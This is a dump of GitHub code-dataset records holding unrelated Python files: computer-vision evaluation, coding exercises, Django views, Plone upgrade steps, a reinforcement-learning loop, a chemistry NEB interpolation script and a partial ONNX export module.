else:\n plot_points = np.vstack([plot_points, np.array([cutoff, midfraction])])\n\n sorting = np.argsort(plot_points[:, 0])\n plot_points = plot_points[sorting, :]\n\n auc = sklearn.metrics.auc(plot_points[plot_points[:, 0] <= cutoff, 0],\n plot_points[plot_points[:, 0] <= cutoff, 1])\n auc = auc / cutoff\n\n return auc, plot_points\n\n\n\ndef single_eval_nyu(true_vps, estm_vps, separate_errors=True, normalised_coords=True, missing_vp_penalty=90.):\n\n fx_rgb = 5.1885790117450188e+02\n fy_rgb = 5.1946961112127485e+02\n cx_rgb = 3.2558244941119034e+02\n cy_rgb = 2.5373616633400465e+02\n\n S = np.matrix([[1. / 320., 0, -1.], [0, 1. / 320., -.75], [0, 0, 1]])\n K = np.matrix([[fx_rgb, 0, cx_rgb], [0, fy_rgb, cy_rgb], [0, 0, 1]])\n SK = S * K\n Kinv = K.I\n SKinv = SK.I\n\n invmat = SKinv if normalised_coords else Kinv\n\n true_num_vps = true_vps.shape[0]\n true_vds = (invmat * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estm_vps.shape[0]\n num_vp_penalty = np.maximum(true_num_vps-estm_num_vps, 0)\n\n missing_vps = -estm_num_vps+true_num_vps\n\n estm_vds = (invmat * np.matrix(estm_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. / np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n loss = cost_matrix[row_ind, col_ind].sum() + num_vp_penalty * missing_vp_penalty\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n if separate_errors:\n return errors, missing_vps, row_ind, col_ind\n else:\n return loss, missing_vps, row_ind, col_ind\n\n\ndef single_eval_yud(invmat, true_vps, estm_vps, separate_errors=True, missing_vp_penalty=90.):\n\n true_num_vps = true_vps.shape[0]\n true_vds = (invmat * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estm_vps.shape[0]\n num_vp_penalty = np.maximum(true_num_vps-estm_num_vps, 0)\n\n estm_vds = (invmat * np.matrix(estm_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. / np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n loss = cost_matrix[row_ind, col_ind].sum() + num_vp_penalty * missing_vp_penalty\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n if separate_errors:\n return errors, row_ind, col_ind\n else:\n return loss, row_ind, col_ind","repo_name":"fkluger/vp-linkage","sub_path":"util/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"646960060","text":"valor = int(input('Qual o valor a ser sacado? R$ '))\ntotal = valor\ncedula = 50\ntotced = 0\nwhile True:\n if total >= cedula:\n total -= cedula\n totced += 1\n else:\n if totced > 0:\n print(f'Total de {totced} cédula(s) de R$ {cedula:.2f}.')\n if cedula == 50:\n cedula = 20\n elif cedula == 20:\n cedula = 10\n elif cedula == 10:\n cedula = 1\n totced = 0 # o total de cédula sempre tem que voltar a zero, porque esgotou a qtdade e vai para outra\n if total == 0:\n break\n\n\n","repo_name":"sararrodolfo/cursoemvideo-python","sub_path":"pacote_dowload/exercicio071.py","file_name":"exercicio071.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70725084051","text":"\r\nfrom header import *\r\nfrom train import *\r\nfrom image_processing import *\r\n\r\ndef machine_learning():\r\n\tprint('*' * 20)\r\n\tprint('MACHINE LEARNING')\r\n\t\r\n\texecute('=' * 20 + '\\nTRAIN', train)\r\n\t\r\ndef process_video():\r\n\tprint('*' * 20)\r\n\tprint('PROCESS VIDEO')\r\n\t\r\n\tprint('Init')\r\n\tsvm = execute('Loading model', cv2.ml.SVM_load, svm_model_file)\r\n\ttemplates, templates_title = execute('Loading templates', load_templates)\r\n\r\n\tinp = cv2.VideoCapture(video_input)\r\n\tvideo_width = int(inp.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n\tvideo_height = int(inp.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\tvideo_fps = inp.get(cv2.CAP_PROP_FPS)\r\n\t\r\n\tprint('Video resolution: (' + str(video_width) + ', ' + str(video_height) + ')')\r\n\tprint('Video fps:', video_fps)\r\n\r\n\tout = cv2.VideoWriter(video_output, -1, video_fps, (normal_width, normal_height))\r\n\t\r\n\tprint('Video is running')\r\n\tinfo = []\r\n\t\r\n\tframe_id = 1\r\n\twhile inp.isOpened():\r\n\t\tret, frame = inp.read()\r\n\t\tif (not ret) or (cv2.waitKey(1) & 0xFF == ord('q')):\r\n\t\t\tbreak\r\n\t\tframe = cv2.resize(frame, (normal_width, normal_height))\r\n\t\tprocess_image(frame, svm, templates, templates_title, frame_id, info)\r\n\t\t\r\n\t\tout.write(frame)\r\n\t\tframe_id += 1\r\n \r\n\twith open(output, 'w') as f:\r\n\t\tf.write(str(len(info)) + '\\n')\r\n\t\tfor elem in info:\r\n\t\t f.write(' '.join(str(x) for x in elem))\r\n\t\t \r\n\tinp.release()\r\n\tout.release()\r\n\tcv2.destroyAllWindows()\r\n\r\n\t\r\nif __name__ == '__main__':\r\n\t# extract_video_datasets('D:\\workspace\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Orginal\\\\abc')\r\n\t# create_train_datasets('D:\\workspace\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Orginal\\\\abc\\_10')\r\n\t# machine_learning()\r\n\tprocess_video()\r\n\r\n\t'''\r\n\tfor img_dir in glob.glob('D:\\workspace\\\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Images\\_5\\*'):\r\n\t\tprint(img_dir.split('.')[0] + '111' + '.jpg')\r\n\t\timg = cv2.imread(img_dir)\r\n\t\timg = cv2.flip(img, 1)\r\n\t\tcv2.imwrite(img_dir.split('.')[0] + '_flip' + '.jpg', img)\r\n\t'''","repo_name":"duyndh98/DigitalRace_2017-2018_UniversityRound","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"71960394449","text":"\"\"\"\r\n\r\nGivalueen a string s which consists of lowercase or uppercase letters, return the length of the longest palindrome that can be built with those letters.\r\n\r\nLetters are case sensitivaluee, for example, \"Aa\" is not considered a palindrome here.\r\n\r\nExample 1:\r\n\r\nInput: s = \"abccccdd\"\r\nOutput: 7\r\nExplanation: One longest palindrome that can be built is \"dccaccd\", whose length is 7.\r\nExample 2:\r\n\r\nInput: s = \"a\"\r\nOutput: 1\r\nExplanation: The longest palindrome that can be built is \"a\", whose length is 1.\r\n\r\n\"\"\"\r\n\r\nfrom collections import Counter\r\n\r\n\r\ndef longest_palindrome(s):\r\n c = Counter(s)\r\n res = 0\r\n k = 0\r\n for i, j in c.items():\r\n print(i, j)\r\n if j % 2 == 0:\r\n res += j\r\n else:\r\n res += j - 1\r\n k += 1\r\n if k >= 1:\r\n res += 1\r\n return res\r\n\r\n\r\nlongest_palindrome(\"dccaccd\")\r\n","repo_name":"BlueBoi904/Pycyharm","sub_path":"files/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16497056143","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom customers.models import Customer\nfrom services.models import Service\nfrom staff.models import StaffModel\nfrom scheduling.models import Appointment\n\n# Create your views here.\ndef unauthorized_view(request):\n return render(request, 'unauthorized.html')\n\ndef login_required_view(request):\n return render(request, 'login_required.html')\n\n@login_required\ndef home_view(request):\n if hasattr(request.user, 'staff'):\n appointments = Appointment.objects.filter(staff__user=request.user)\n services=Service.objects.all()\n staffs=StaffModel.objects.all()\n elif hasattr(request.user, 'user'):\n appointments = Appointment.objects.filter(customer__user=request.user)\n services=Service.objects.filter(is_working=True)\n staffs=StaffModel.objects.filter(is_active=True)\n else:\n appointments=Appointment.objects.all()\n services=Service.objects.all()\n staffs=StaffModel.objects.all()\n appointments_today = appointments.order_by('appdatetime')\n context = {\n 'todays': appointments_today,\n \"services\": services,\n \"staffs\": staffs,\n }\n return render(request, 'overview.html', context)\n","repo_name":"mikaelaatan/msys42-salonmgtsystem","sub_path":"app/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29763019791","text":"import json\r\nimport csv\r\n\r\ndata = []\r\nwith open(\"test-data.json\", \"r\") as fp:\r\n temp = fp.read()\r\n data = json.loads(temp)\r\n\r\n# temp[service[\"table_name\"]] = [i for n, i in enumerate(\r\n # temp[service[\"table_name\"]]) if i not in\r\n # temp[service[\"table_name\"]][:n]]\r\n\r\nduplicates = [i for n, i in enumerate(data) if i in data[:n]]\r\nunique = [i for n, i in enumerate(data) if i not in data[:n]]\r\n# print(temp)\r\nwith open(\"actual-data-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(data)\r\n\r\nwith open(\"duplicate-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(duplicates)\r\n\r\nwith open(\"unique-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(unique)","repo_name":"crypto-44/FindDuplicatesInArrayOfValues","sub_path":"lambda_handler.py","file_name":"lambda_handler.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39658515660","text":"import unittest\nfrom typing import List\nfrom pprint import pprint\n\n\nclass Solution:\n def fractionToDecimal(self, numerator: int, denominator: int) -> str:\n res, cache = [], {}\n i = 0\n sign = \"-\" if numerator * denominator < 0 else \"\"\n numerator, denominator = abs(numerator), abs(denominator)\n\n int_part, remainder = divmod(numerator, denominator)\n while remainder > 0:\n numerator = remainder*10\n if numerator in cache:\n s, e = cache[numerator], i\n not_repeating = str(int_part) + \".\" + \"\".join(res[:s])\n repeating = \"(\" + \"\".join(res[s:e]) + \")\"\n return sign+not_repeating+repeating\n\n quotient, remainder = divmod(numerator, denominator)\n res.append(str(quotient))\n cache[numerator] = i\n i += 1\n else:\n return sign+str(int_part) + ((\".\" + \"\".join(res)) if res else \"\")\n\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n numerator = 1\n denominator = 2\n expected = \"0.5\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_2(self):\n sol = Solution()\n numerator = 2\n denominator = 1\n expected = \"2\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_3(self):\n sol = Solution()\n numerator = 2\n denominator = 3\n expected = \"0.(6)\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_4(self):\n sol = Solution()\n numerator = 4\n denominator = 333\n expected = \"0.(012)\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_5(self):\n sol = Solution()\n numerator = 1\n denominator = 5\n expected = \"0.2\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/cn/166_fraction_to_recurring_decimal.py","file_name":"166_fraction_to_recurring_decimal.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73835964370","text":"class Disturbance:\n \"\"\"Class for represanting disturbances\"\"\"\n\n def __init__(self, variable: str | None, amplitude_value: float) -> None:\n if amplitude_value > 0:\n self.isPositive: bool = True\n self.amplitude: float | None = amplitude_value\n elif amplitude_value < 0:\n self.amplitude = amplitude_value\n self.isPositive = False\n elif amplitude_value == 0:\n self.amplitude = None\n self.isPositive = False\n\n if variable == \"u\":\n self.axis: int | None = 1\n self.type: str | None = \"Derivative\" # Translational Only get Derivative\n self.isRotational: bool = False\n elif variable == \"w\":\n self.axis = 3\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = False\n elif variable == \"q\":\n self.axis = 2\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = True\n elif variable == \"theta\":\n self.axis = 2\n self.type = \"Value\" # Rotational\n self.isRotational = True\n\n elif variable == \"v\":\n self.axis = 2\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = False\n elif variable == \"p\":\n self.axis = 1\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = True\n elif variable == \"r\":\n self.axis = 3\n self.type = \"Derivative\" # Rotational Only get Derivative\n self.isRotational = True\n elif variable == \"phi\":\n self.axis = 1\n self.type = \"Value\" # Rotational\n self.isRotational = True\n elif variable is None:\n self.axis = None\n self.type = None\n self.amplitude = None\n self.name: str = \"Trim\"\n self.var: str = \"Trim\"\n else:\n raise ValueError(\"Invalid disturbance variable\")\n if variable is not None:\n self.name = f\"{variable} disturbance\"\n self.var = variable\n\n def __str__(self) -> str:\n return f\"{self.name}:\\tType:\\t{self.type} and \\tAmplitude:\\t{self.amplitude}.\"\n","repo_name":"trifwn/Icarus","sub_path":"ICARUS/Flight_Dynamics/disturbances.py","file_name":"disturbances.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"38591575580","text":"def merge(lista1, lista2):\n # Nueva lista para guardar elementos\n nueva = list() \n # Vamos extraer los primeros elementos de cada lista y compararlos mientras se pueda\n while len(lista1) > 0 and len(lista2) > 0:\n # Si el primer elemento de la primera lista es menor o igual que el de la segunda\n if lista1[0] <= lista2[0]:\n # Lo agregamos a nuesta nueva lista\n nueva.append(lista1[0]) \n # Removemos el primer elemento de la primera lista\n lista1 = lista1[1:]\n else: # Si el primer elemento de la segunda lista es menor\n # Se agrega a la nueva lista\n nueva.append(lista2[0]) \n # Removemos el primer elemento de la segunda lista\n lista2 = lista2[1:]\n # Notar que en algun momento una de las dos listas quedara vacia antes que la otra\n # Con los ciclos que siguen vamos a agregar los elementos sobrantes a nuesta nueva lista\n # Solo uno de los siguientes dos ciclos se ejecutara\n for v1 in lista1:\n nueva.append(v1)\n for v2 in lista2:\n nueva.append(v2)\n return nueva\n# Prueba\nl1 = [1, 1, 2, 3, 5, 6, 10, 12]\nl2 = [0, 2, 5, 5, 7, 8]\nprint(merge(l1, l2))","repo_name":"progra-utfsm/ejercicios","sub_path":"docs/python/listas/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9117939530","text":"import argparse\nimport ase.io\nfrom ase.neb import NEB\nimport os\n\n\ndef get_atoms(file, index):\n if \".traj\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"traj\")\n elif \".xyz\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"xyz\")\n elif \".xml\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"vasp-xml\")\n else:\n raise f\"Check the format of the file, {file} to read.\"\n return atoms\n\n\ndef read_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Interpolates between IS to TS and TS to FS\")\n parser.add_argument(\"--IS\", type=str, required=True,\n help=\"path of initial state structure\", metavar=\"\")\n parser.add_argument(\"--TS\", type=str, required=True,\n help=\"path of guess transition state structure\", metavar=\"\")\n parser.add_argument(\"--FS\", type=str, required=True,\n help=\"path of final state structure\", metavar=\"\")\n parser.add_argument(\"--out_dir\", type=str, default=\".\",\n help=\"output directory (default is \\\".\\\" i.e. current working directory)\", metavar=\"\")\n parser.add_argument(\"--IS_index\", type=int, default=-1,\n help=\"index of IS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--TS_index\", type=int, default=-1,\n help=\"index of TS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--FS_index\", type=int, default=-1,\n help=\"index of FS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--method\", type=str, default=\"linear\", choices=[\n \"linear\", \"idpp\"], help=\"NEB interpolation method (default is linear)\", metavar=\"\")\n parser.add_argument(\"--left\", type=int, default=2,\n help=\"number of images to interpolate between IS and TS (default is 2)\", metavar=\"\")\n parser.add_argument(\"--right\", type=int, default=2,\n help=\"number of images to interpolate between TS and FS (default is 2)\", metavar=\"\")\n args = parser.parse_args()\n\n if args.out_dir[-1] == \"/\":\n args.out_dir = args.out_dir[:-1]\n\n return args\n\n\nif __name__ == '__main__':\n args = read_command_line_arguments()\n\n initial_structure = get_atoms(file=args.IS, index=args.IS_index)\n initial_structure.pbc = True\n transition_structure = get_atoms(file=args.TS, index=args.TS_index)\n transition_structure.pbc = True\n final_structure = get_atoms(file=args.FS, index=args.FS_index)\n final_structure.pbc = True\n\n guess_path = []\n images = [initial_structure]\n images += [initial_structure.copy() for _ in range(args.left)]\n images += [transition_structure]\n neb = NEB(images)\n neb.interpolate(method=args.method, mic=True)\n guess_path = images[1:] # this includes the guess TS but excludes IS\n del images\n\n images = [transition_structure]\n images += [transition_structure.copy() for i in range(args.right)]\n images += [final_structure]\n neb = NEB(images)\n neb.interpolate(method=args.method, mic=True)\n guess_path += images[1:-1] # this excludes both the guess TS and FS\n del images\n\n if not os.path.exists(f\"{args.out_dir}\") and args.out_dir != \".\":\n os.makedirs(f\"{args.out_dir}\")\n ase.io.write(f\"{args.out_dir}/is.traj\", initial_structure)\n ase.io.write(f\"{args.out_dir}/fs.traj\", final_structure)\n ase.io.write(f\"{args.out_dir}/guess_path.traj\", guess_path)\n","repo_name":"skethirajan/MOF_CODES","sub_path":"mof_codes/dft/VASP/neb_interpolate.py","file_name":"neb_interpolate.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16368998789","text":"import platform\nimport os\nimport sys\nfrom shutil import which\nfrom subprocess import call\nimport Core.LinuxStartUp as Start\n\n\nif sys.version_info[:2] < (3, 7):\n print(\"Requires Python 3.7 or newer. \"\n \"Python %d.%d detected\" % sys.version_info[:2])\n sys.exit(-1)\n\nif platform.system() == 'Windows':\n OS = 'Windows'\nelif platform.system() == 'Linux':\n OS = 'Linux'\nelif platform.system() == 'Darwin':\n OS = 'Darwin'\n\npath = os.getcwd()\nif OS == 'Windows':\n cache = path + '\\Core\\Cache'\nelif OS == 'Darwin':\n cache = path + '/Core/Cache'\nelse: # Linux\n cache = path + '/Core/Cache'\n\nisExist = os.path.exists(cache)\nif not isExist: # Create a new directory because it does not exist\n os.system('pip install -r requirements.txt')\n os.system('pip install latex')\n if OS == 'Windows':\n if which('latex'):\n print('latex installed')\n else:\n print('Please install Latex before using the software')\n sys.exit(-1)\n elif OS == 'Darwin':\n if which('latex'):\n print('latex installed')\n else:\n os.system(\n '/bin / bash - c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"')\n os.system('brew install mactex')\n else: # Linux\n pwd = Start.Linux()\n cmd = 'sudo apt install -y idle3 texlive-latex-extra cm-super dvipng'\n return_call = call('echo {} | sudo -S {}'.format(pwd, cmd), shell=True)\n while return_call == 1:\n pwd = Start.Linux()\n cmd = 'sudo apt install -y idle3 texlive-latex-extra cm-super dvipng'\n return_call = call('echo {} | sudo -S {}'.format(pwd, cmd), shell=True)\n os.makedirs(cache)\n\n\nif OS == 'Windows':\n import Core.GUI\nelif OS == 'Darwin':\n import Core.GUI\nelse: # Linux\n import Core.GUI\n","repo_name":"CharlieGPA40/SHG-Simulation-Package-Beta","sub_path":"StartGui.py","file_name":"StartGui.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73351922778","text":"from plone import api\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom zope.component import getAllUtilitiesRegisteredFor\n\nimport logging\nimport transaction\n\n\nlogger = logging.getLogger(__name__)\nPACKAGE_NAME = \"collective.behavior.relatedmedia\"\n\n\ndef package_rename(context):\n profile_id = \"profile-{0}:default\".format(PACKAGE_NAME)\n oldreg_profile_id = \"profile-{0}:package_rename\".format(PACKAGE_NAME)\n # remove old registry entries\n context.runAllImportStepsFromProfile(oldreg_profile_id)\n # add new registry\n context.runImportStepFromProfile(profile_id, \"plone.app.registry\")\n\n\ndef local_gallery_configuration(context):\n update_profile_id = \"profile-{0}:local_config\".format(PACKAGE_NAME)\n context.runAllImportStepsFromProfile(update_profile_id)\n\n\ndef registry_cleanup(context):\n update_profile_id = \"profile-{0}:registry_cleanup\".format(PACKAGE_NAME)\n context.runAllImportStepsFromProfile(update_profile_id)\n\n\ndef migrate_base_path_relations(context):\n from collective.behavior.relatedmedia.behavior import IRelatedMediaBehavior\n\n catalog = api.portal.get_tool(\"portal_catalog\")\n items = catalog(\n object_provides=\"collective.behavior.relatedmedia.behavior.IRelatedMedia\",\n )\n _num_items = len(items)\n\n for idx, item in enumerate(items, 1):\n try:\n obj = item.getObject()\n except KeyError as msg:\n # there might be broken objects\n logger.warning(f\"Could not migrate {item.getPath()}: {msg}\")\n continue\n\n try:\n base_path = IRelatedMediaBehavior(obj).related_media_base_path\n except TypeError:\n logger.info(\n f\"{idx}/{_num_items} no relatedmedia behavior registered for {item.getPath()}.\"\n )\n continue\n\n if not base_path:\n logger.info(\n f\"{idx}/{_num_items} skip migration of {item.getPath()} -> no base path defined.\"\n )\n continue\n\n logger.info(f\"{idx}/{_num_items} migrating {item.getPath()}.\")\n\n for media in catalog(path=base_path.to_path):\n # related images\n if media.portal_type == \"Image\":\n img_obj = media.getObject()\n api.relation.create(\n source=obj, target=img_obj, relationship=\"related_images\"\n )\n logger.info(f\" - related_image {media.getPath()} created\")\n continue\n # related attachments\n if media.portal_type == \"File\":\n file_obj = media.getObject()\n api.relation.create(\n source=obj, target=file_obj, relationship=\"related_attachments\"\n )\n logger.info(f\" - related_attachment {media.getPath()} created\")\n continue\n logger.info(f\" - no relation created for unknown type {media.getPath()}...\")\n\n # remove base_path information\n IRelatedMediaBehavior(obj).related_media_base_path = None\n transaction.commit()\n\n\ndef migrate_behavior_name(context):\n ftis = getAllUtilitiesRegisteredFor(IDexterityFTI)\n\n for fti in ftis:\n updated_fti = []\n for behavior in fti.behaviors:\n if behavior in updated_fti:\n continue\n if behavior == \"collective.behavior.relatedmedia.behavior.IRelatedMedia\":\n updated_fti.append(\"collective.relatedmedia\")\n else:\n updated_fti.append(behavior)\n fti.behaviors = tuple(updated_fti)\n","repo_name":"collective/collective.behavior.relatedmedia","sub_path":"collective/behavior/relatedmedia/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"11564319853","text":"from js9 import j\nimport blist\nfrom blist import * # https://github.com/DanielStutzbach/blist\nfrom test_pb2 import *\nfrom google.protobuf import json_format\nfrom google.protobuf import text_format\n\n\nclass Person2():\n def __init__(self, nr):\n self.nr = nr\n\n @property\n def obj(self):\n m = Person()\n m.FromString(out[self.nr])\n return m\n\n\nstartmb = j.application.getMemoryUsage() / 1024\nprint(\"start:%s MB\" % startmb)\nprint(\"start\")\ntot = 20000\ndata = \"a\" * 100\nout = blist()\nout2 = blist()\npersons = []\nfor i in range(tot):\n m = Person()\n m.name = data\n m.phones.add(number=\"23424324\", type=Person.MOBILE)\n m.SerializeToString()\n out.append(m.SerializeToString())\n out2.append(\"this is a name;urgent;something\")\n # persons.append(Person2(i))\nprint(\"read\")\nfor item in out:\n m = Person()\n m = m.FromString(item)\n json_format.MessageToDict(m)\n # text_format.MessageToString(m)\nprint(\"stop\")\n\n\nprint(\"minsize:%s MB\" % ((tot * (len(data) + 30)) / 1024 / 1024))\n\nstopmb = j.application.getMemoryUsage() / 1024\nprint(\"dataused:%s MB\" % (stopmb - startmb))\n\n# res = []\n\n# startmb = j.application.getMemoryUsage() / 1024\n# print(\"start:%s MB\" % startmb)\n# print(\"start\")\n# tot = 100000\n# data = \"a\" * 100\n# for i in range(tot):\n# m = test.SearchRequest()\n# m.query = data\n# res.append(m)\n# print(\"stop\")\n\n# print(\"minsize:%s MB\" % (tot * len(data) / 1024 / 1024))\n\n# stopmb = j.application.getMemoryUsage() / 1024\n# print(\"dataused:%s MB\" % (stopmb - startmb))\n","repo_name":"Incubaid/playenv","sub_path":"protobuf/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73297752215","text":"import numpy as np\n\ndef debug(debuglevel, msg, DEBUG=1, **kwargs):\n if debuglevel <= DEBUG:\n if 'printNow' in kwargs:\n if kwargs['printNow']:\n print(msg) \n else:\n print(msg) \n\ndef env_update(env, RL, data, episodes=50, sim_speed = 0.05, showRender=True, renderEveryNth=5, printEveryNth=1):\n global_reward = np.zeros(episodes)\n data['global_reward']=global_reward\n\n for episode in range(episodes): \n t=0\n # initial state\n if episode == 0:\n state = env.reset(value = 0)\n else:\n state = env.reset()\n \n debug(2,'state(ep:{},t:{})={}'.format(episode, t, state))\n\n # RL choose action based on state\n action = RL.choose_action(str(state))\n while True:\n # fresh env\n #if(t<5000 and (showRender or (episode % renderEveryNth)==0)):\n if(showRender or (episode % renderEveryNth)==0):\n env.render(sim_speed)\n\n\n # RL take action and get next state and reward\n state_, reward, done = env.step(action)\n global_reward[episode] += reward\n debug(2,'state(ep:{},t:{})={}'.format(episode, t, state))\n debug(2,'reward_{}= total return_t ={} Mean50={}'.format(reward, global_reward[episode],np.mean(global_reward[-50:])))\n \n\n # RL learn from this transition\n # and determine next state and action\n state, action = RL.learn(str(state), action, reward, str(state_))\n\n\n # break while loop when end of this episode\n if done:\n break\n else:\n t=t+1\n\n debug(1,\"({}) Episode {}: Length={} Total return = {} \".format(RL.display_name,episode, t, global_reward[episode],global_reward[episode]),printNow=(episode%printEveryNth==0))\n if(episode>=100):\n debug(1,\" Median100={} Variance100={}\".format(np.median(global_reward[episode-100:episode]),np.var(global_reward[episode-100:episode])),printNow=(episode%printEveryNth==0))\n # end of game\n print('game over -- Algorithm {} completed'.format(RL.display_name))\n env.destroy()","repo_name":"wiesnseb/sailing_rf","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34805379085","text":"\"\"\"Urls for User and UserProfile views\"\"\"\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\n\nfrom . import views\n\napp_name = \"accounts\"\n\n\nurlpatterns = [\n # login and registration endpoints\n path(\"register\", views.RegisterView.as_view(), name=\"register\"),\n path(\n \"login/\",\n auth_views.LoginView.as_view(\n template_name=\"registration/login.html\", redirect_authenticated_user=True\n ),\n name=\"login\",\n ),\n path(\n \"logout/\",\n auth_views.LogoutView.as_view(template_name=\"registration/logout.html\"),\n name=\"logout\",\n ),\n # detail view\n path(\n \"profile//\", views.UserProfileView.as_view(), name=\"profile-detail\"\n ),\n]\n","repo_name":"adam-harmasz/gomoku_v_0_2","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8483530101","text":"\nfrom os import PathLike\nfrom pathlib import Path\n\nfrom transformers import HubertConfig, HubertForCTC\n\nimport torch\nimport torch.onnx\n\nfrom ..converters.convert_hubert import (\n extract_hubert_config,\n extract_hubert_state,\n load_fairseq_hubert,\n)\nfrom ..converters.convert_vits import (\n extract_vits_config,\n extract_vits_state,\n load_vits_checkpoint,\n)\nfrom ..models.configuration_rvc import RVCConfig\nfrom ..models.feature_extraction_rvc import RVCFeatureExtractor\nfrom ..models.modeling_rvc import RVCModel\nfrom ..models.vits.models import (\n SynthesizerTrnMs256NSFsid,\n SynthesizerTrnMs256NSFsidConfig,\n)\n\ndef export_onnx(\n vits_path: str | PathLike,\n output_path: str | PathLike = \"./models/out.onnx\",\n save_directory: str | PathLike | None = None,\n hubert_path: str | PathLike = \"./models/hubert_base\",\n f0_method: str = \"pm\",\n unsafe: bool = False,\n safe_serialization=True,\n):\n \"\"\"Export onnx.\n\n Args:\n vits_path: Path to the original VITS checkpoint.\n save_directory: Directory to save the converted 